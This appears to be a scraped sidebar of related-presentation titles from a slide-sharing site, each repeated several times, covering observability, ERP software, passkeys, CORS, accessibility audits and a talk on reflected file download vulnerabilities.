Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties ReimaginedEasier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 

Reflected File Download Vulnerability - Narendra Bhati